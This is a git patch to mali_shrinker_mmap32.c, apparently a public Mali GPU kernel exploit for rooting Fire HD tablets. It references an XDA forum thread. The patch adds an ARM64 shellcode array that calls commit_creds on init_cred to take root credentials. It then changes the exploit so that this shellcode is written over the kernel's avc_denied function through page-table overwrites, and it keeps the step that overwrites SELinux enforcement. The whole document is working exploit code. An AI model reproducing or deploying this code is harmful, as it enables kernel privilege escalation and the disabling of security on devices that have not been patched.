From 85dbd36e18dd8b87a6d3038266b4e2e6ef445121 Mon Sep 17 00:00:00 2001 From: yuu <46545607+mouseos@users.noreply.github.com> Date: Wed, 8 May 2024 13:15:22 +0900 Subject: [PATCH] =?UTF-8?q?Baiker000=E6=B0=8F=E3=81=AE=E5=A4=89=E6=9B=B4?= =?UTF-8?q?=E3=82=92=E5=8F=8D=E6=98=A0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89496554 Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com> --- mali_shrinker_mmap32.c | 37 ++++++++++--------------------------- 1 file changed, 10 insertions(+), 27 deletions(-) diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index 3cd6753..63e0ea9 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -91,6 +91,7 @@ Overwriting SELinux to permissive static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; static uint32_t root_code[8] = {0}; +static uint32_t root_code2[8]={0}; static uint32_t root_code_un[8] = {0}; static uint8_t jit_id = 1; @@ -469,15 +470,15 @@ void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_de printf("Run fixup_root_shell2\n"); uint32_t init_adpr = write_adrp(0, avc_deny, init_cred); // Sets x0 to init_cred - root_code[ADRP_INIT_INDEX] = init_adpr; - root_code[ADD_INIT_INDEX] = add_init; + root_code2[ADRP_INIT_INDEX] = init_adpr; + root_code2[ADD_INIT_INDEX] = add_init; // Sets x8 to commit_creds - root_code[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred); - root_code[ADD_COMMIT_INDEX] = add_commit; - root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] - root_code[5] = 0xd63f0100; // blr x8 - root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 - root_code[7] = 0xd65f03c0; // ret + root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred); + root_code2[ADD_COMMIT_INDEX] = add_commit; + root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code2[5] = 0xd63f0100; // blr x8 + root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code2[7] = 0xd65f03c0; // ret printf("End fixup_root_shell2\n"); } @@ -690,33 +691,15 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) //Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } -/*for onyx void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { - uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; - write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - - usleep(100000); - - //Call commit_creds to overwrite process credentials to gain root - write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t)); -// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); -// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); -} -*/ -//original code(avc_deny) -void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { - /* Skip this uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); usleep(100000); //Go through the reserve pages addresses to write to avc_denied with our own shellcode - write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t)); - //Triggers avc_denied to disable SELinux - open("/dev/kmsg", O_RDONLY); - */ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);